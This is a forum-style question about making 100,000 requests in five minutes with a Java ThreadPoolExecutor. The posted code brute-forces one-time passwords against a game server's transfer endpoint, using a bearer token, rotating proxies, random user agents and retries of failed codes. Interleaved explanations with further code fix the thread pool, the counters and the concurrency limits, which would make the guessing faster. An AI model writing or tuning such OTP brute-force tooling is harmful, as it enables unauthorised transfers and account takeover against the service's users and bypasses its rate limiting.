Making 100,000 requests in 5 minutes with ThreadPoolExecutor

g2ieeal7, posted on 2021-08-25 in Java

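Do you think this is possible? I use java.util.concurrent and java.net HttpURLConnection to send one request from each thread in the pool, but I ran into a problem:
Some connections never finish and hold their thread for a long time. I can see that the pool does not terminate because some threads never complete.
This also uses a lot of network bandwidth, and when the connection slows down almost every request fails with a connect timeout or read timeout exception. Is there a better solution? I also tried asynchronous libraries such as Java reactive WebFlux and io.vertx WebClient, but they were no better.
Here is part of my code: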

public static void cancelMobile(User user, int split, int start, int end, String nickNameRecv, boolean useProxy, int timeout) {
        long startTime = System.currentTimeMillis();
        makeRandomOTPQueue(start, end);
        int size = 50000;//randomOTP.size();
        System.out.println("LUONG: " + split + " TOTAL: " + size);
        ArrayBlockingQueue<Runnable> workQueue = new ArrayBlockingQueue<>(size);
        RejectedExecutionHandler handler = new ThreadPoolExecutor.DiscardOldestPolicy();
        ThreadPoolExecutor threadPoolExecutor = /*(ThreadPoolExecutor) Executors.newCachedThreadPool();*/
                new ThreadPoolExecutor(split,
                        1000, Long.MAX_VALUE, TimeUnit.NANOSECONDS, workQueue, handler);
        ScheduledExecutorService scheduledThreadPoolExecutor = Executors.newScheduledThreadPool(split);
        threadPoolExecutor.allowCoreThreadTimeOut(false);
        List<TransferSMSOTP> transferSMSOTPList = new LinkedList<>();
        for (int j = 0; j < size; j++) {
            threadPoolExecutor.submit(new TransferSMSOTP(user, String.valueOf(randomOTP.get(j)),
                    useProxy ? _Proxy.getRandomProxy(Main._proxy) : null, nickNameRecv, timeout));
//            scheduledThreadPoolExecutor.schedule(new TransferSMSOTP(user, String.valueOf(randomOTP.get(j)),
//                    useProxy ? _Proxy.getRandomProxy(Main._proxy) : null, nickNameRecv, timeout),1000, TimeUnit.MILLISECONDS);
        }
        threadPoolExecutor.shutdown();
        while (!threadPoolExecutor.isTerminated()) {
        }
        ThreadPoolExecutor poolFail = new ThreadPoolExecutor(split,
                randomOTP.size(), 1, TimeUnit.MILLISECONDS, workQueue, handler);
        System.out.println("RETRY amount: " + failList.size());
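        // Snapshot the failures and reset the shared list, so that only OTPs
        // that fail again are counted as unhandled at the end.
        LinkedList<Integer> clone = new LinkedList<>(failList);
        failList.clear();
        System.out.println("waiting pop fail otp");
        long backup = System.currentTimeMillis();
        // remove() shrinks the list, so loop until it is empty rather than by index.
        while (!clone.isEmpty()) {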
            try {
                poolFail.execute(new TransferSMSOTP(user, String.valueOf(clone.remove()),
                        useProxy ? _Proxy.getRandomProxy(Main._proxy) : null, nickNameRecv, timeout));
            } catch (Exception e) {
                System.out.println("cannot pop: " + e.getMessage());
            }
//            if (System.currentTimeMillis() - backup > TimeUnit.MINUTES.toMillis(2)) {
//                System.out.println("Exit pop");
//                poolFail.shutdownNow();
//            }
        }
        poolFail.shutdown();
        System.out.println("waiting handle failed otp");
        while (!poolFail.isTerminated()) {
            if (System.currentTimeMillis() - startTime > TimeUnit.MINUTES.toMillis(5)) {
                System.out.println("Exit fail handle");
                poolFail.shutdownNow();
//                System.exit(0);
                break;
            }
        }
        System.out.println("UNHANDLED amount: " + failList.size() + ", total time of job: " + (System.currentTimeMillis() - startTime));
    }
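
One detail of the pool setup above may explain why raising the maximum to 1000 has little effect. A ThreadPoolExecutor only creates threads beyond corePoolSize when its work queue refuses a task, that is, when the queue is full. With an ArrayBlockingQueue large enough to hold every task, the queue never fills, so at most `split` threads ever run. The following is a minimal sketch that shows this with small numbers; the class and method names are made up for illustration and are not part of the original code.

```java
import java.util.concurrent.ArrayBlockingQueue;
import java.util.concurrent.CountDownLatch;
import java.util.concurrent.ThreadPoolExecutor;
import java.util.concurrent.TimeUnit;

public class PoolGrowthDemo {

    // Submits `tasks` blocking tasks and reports the largest number of
    // threads the pool ever created.
    public static int largestPoolSize(int core, int max, int queueCapacity, int tasks) {
        CountDownLatch release = new CountDownLatch(1);
        ThreadPoolExecutor pool = new ThreadPoolExecutor(
                core, max, 1, TimeUnit.SECONDS,
                new ArrayBlockingQueue<>(queueCapacity));
        try {
            for (int i = 0; i < tasks; i++) {
                pool.execute(() -> {
                    try {
                        release.await(); // keep the worker thread busy
                    } catch (InterruptedException e) {
                        Thread.currentThread().interrupt();
                    }
                });
            }
            return pool.getLargestPoolSize();
        } finally {
            release.countDown(); // let all tasks finish
            pool.shutdown();
        }
    }

    public static void main(String[] args) {
        // Queue holds every waiting task: the pool stays at the core size.
        System.out.println(largestPoolSize(2, 10, 100, 50));  // prints 2
        // Core size equal to maximum: all 10 threads are started.
        System.out.println(largestPoolSize(10, 10, 100, 50)); // prints 10
    }
}
```

If more concurrency is the goal, setting the core size equal to the maximum (or using a much smaller queue) is one way to get it with this executor.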

In my Runnable class:

public void run() {
        try {
            String url = this.user.getServer().getUrlTransfer();
            Document data = new Document();
            data.put("nickNameRecv", this.nickNameRecv);
            data.put("otp", otp);
            String authorization = "Bearer " +
                    this.user.getAuth();
            URL urlCon = new URL(url);
            HttpURLConnection connection;
            // Only touch the proxy settings when a proxy was supplied;
            // _proxy is null when useProxy is false.
            if (_proxy == null) {
                connection = (HttpURLConnection) urlCon.openConnection();
            } else {
                final String authUser = this._proxy.getProxyUserName();
                final String authPassword = this._proxy.getProxyPassword();
                // Authenticator.setDefault is JVM-wide, so concurrent tasks overwrite each other's credentials.
                Authenticator.setDefault(new ProxyAuthenticator(authUser, authPassword));
                Proxy proxy = new Proxy(Proxy.Type.HTTP, new InetSocketAddress(this._proxy.getProxyHost(), this._proxy.getProxyPort()));
                connection = (HttpURLConnection) urlCon.openConnection(proxy);
            }
            connection.setRequestMethod("POST");
            connection.setConnectTimeout(timeout);
            connection.setReadTimeout(timeout);
            connection.setRequestProperty(HttpHeaders.ACCEPT, ContentType.APPLICATION_JSON.toString());
            connection.setRequestProperty(HttpHeaders.CONTENT_TYPE, ContentType.APPLICATION_JSON.toString());
            connection.setRequestProperty(HttpHeaders.AUTHORIZATION, authorization);
            connection.setRequestProperty("client-browser", "Chrome 83");
//                connection.setRequestProperty("client-deviceid", rand(32, -1, "abcdef1234567890"));
            connection.setRequestProperty("client-operatingsystem", "Windows");
            // Encode once so that Content-Length counts bytes rather than chars.
            byte[] body = data.toJson().getBytes(java.nio.charset.StandardCharsets.UTF_8);
            connection.setRequestProperty("Content-Length", String.valueOf(body.length));
            connection.setRequestProperty(HttpHeaders.USER_AGENT, Main.agent.get(new Random().nextInt(Main.agent.size())));
            connection.setDoOutput(true);
            OutputStream outputStream = connection.getOutputStream();
            outputStream.write(body);

            InputStream inputStream = connection.getInputStream();

            ObjectMapper mapper = new ObjectMapper();
            Map res = mapper.readValue(inputStream, Map.class);

            outputStream.close();
            inputStream.close();
            connection.disconnect();
            ProcessGame.done++;
            Main.f.updateResult();
        } catch (Exception e) {
            ProcessGame.failList.add(Integer.parseInt(this.otp));
        }
    }
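
The `run()` method above updates `ProcessGame.done` with `++` and adds to `failList` from many pool threads at once. Neither an `int` increment nor `LinkedList.add` is thread-safe, so counts can be lost and the list can be corrupted, which would also distort the retry numbers. Below is a minimal sketch of the usual alternative with `AtomicInteger` and `ConcurrentLinkedQueue`. The class `Results` and its methods are hypothetical stand-ins, and the simulated failure rate is invented for the demo.

```java
import java.util.concurrent.ConcurrentLinkedQueue;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.atomic.AtomicInteger;

public class Results {
    private final AtomicInteger done = new AtomicInteger();
    private final ConcurrentLinkedQueue<Integer> failed = new ConcurrentLinkedQueue<>();

    public void recordSuccess() { done.incrementAndGet(); }
    public void recordFailure(int otp) { failed.add(otp); }
    public int doneCount() { return done.get(); }
    public int failedCount() { return failed.size(); }

    // Simulates `tasks` workers in which every tenth one "fails".
    public static Results simulate(int threads, int tasks) {
        Results results = new Results();
        ExecutorService pool = Executors.newFixedThreadPool(threads);
        for (int i = 0; i < tasks; i++) {
            final int otp = i;
            pool.execute(() -> {
                if (otp % 10 == 0) {
                    results.recordFailure(otp);
                } else {
                    results.recordSuccess();
                }
            });
        }
        pool.shutdown();
        try {
            // Block with a deadline instead of spinning on isTerminated().
            if (!pool.awaitTermination(30, TimeUnit.SECONDS)) {
                pool.shutdownNow();
            }
        } catch (InterruptedException e) {
            pool.shutdownNow();
            Thread.currentThread().interrupt();
        }
        return results;
    }

    public static void main(String[] args) {
        Results r = simulate(16, 10_000);
        // prints "9000 done, 1000 failed"
        System.out.println(r.doneCount() + " done, " + r.failedCount() + " failed");
    }
}
```

The same `awaitTermination` call could also replace the empty `while (!isTerminated())` loops, which otherwise keep one CPU core busy while waiting.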

The best result I have gotten is about 20,000 of 99,999 requests returning HTTP status 200. Is there a better solution?
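
As a rough sizing check, 100,000 requests in 300 seconds is about 334 requests per second sustained. By Little's law the number of requests in flight is roughly rate × average latency, so with an assumed average response time of 2 seconds (an illustrative figure, not a measurement) around 670 requests would need to be outstanding at once. One way to hold concurrency at such a level without one thread per request is to cap asynchronous calls with a semaphore and give each call a deadline. The sketch below is generic over any call that returns a `CompletableFuture`. On Java 11+, `HttpClient.sendAsync` could be such a call, but that pairing is an assumption and is not exercised here. All names are hypothetical, and `orTimeout` requires Java 9 or later.

```java
import java.time.Duration;
import java.util.ArrayList;
import java.util.List;
import java.util.concurrent.CompletableFuture;
import java.util.concurrent.Semaphore;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.atomic.AtomicInteger;
import java.util.function.Supplier;

public class BoundedAsync {

    // Starts each call only when fewer than maxInFlight are outstanding.
    // A call that exceeds `timeout` completes exceptionally; note that this
    // does not by itself cancel the underlying work.
    public static <T> List<CompletableFuture<T>> runBounded(
            List<Supplier<CompletableFuture<T>>> calls, int maxInFlight, Duration timeout) {
        Semaphore permits = new Semaphore(maxInFlight);
        List<CompletableFuture<T>> results = new ArrayList<>();
        for (Supplier<CompletableFuture<T>> call : calls) {
            permits.acquireUninterruptibly(); // wait for a free slot
            CompletableFuture<T> started;
            try {
                started = call.get();
            } catch (RuntimeException e) {
                started = CompletableFuture.failedFuture(e);
            }
            results.add(started
                    .orTimeout(timeout.toMillis(), TimeUnit.MILLISECONDS)
                    .whenComplete((value, error) -> permits.release()));
        }
        return results;
    }

    // Demo with fake calls that sleep briefly; returns the peak concurrency seen.
    public static int demoPeak(int count, int maxInFlight) {
        AtomicInteger active = new AtomicInteger();
        AtomicInteger peak = new AtomicInteger();
        List<Supplier<CompletableFuture<Integer>>> calls = new ArrayList<>();
        for (int i = 0; i < count; i++) {
            final int id = i;
            calls.add(() -> {
                peak.accumulateAndGet(active.incrementAndGet(), Math::max);
                return CompletableFuture.supplyAsync(() -> {
                    sleep(5);
                    active.decrementAndGet(); // finished before the permit is released
                    return id;
                });
            });
        }
        List<CompletableFuture<Integer>> futures =
                runBounded(calls, maxInFlight, Duration.ofSeconds(5));
        CompletableFuture.allOf(futures.toArray(new CompletableFuture[0])).join();
        return peak.get();
    }

    private static void sleep(long millis) {
        try {
            Thread.sleep(millis);
        } catch (InterruptedException e) {
            Thread.currentThread().interrupt();
        }
    }

    public static void main(String[] args) {
        // The reported peak never exceeds the limit of 4.
        System.out.println("peak in flight: " + demoPeak(40, 4));
    }
}
```

Whether this improves the success rate depends on what limits it. If the server or the proxies throttle or drop connections, raising client-side concurrency will not help, and a lower limit with retries may do better.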
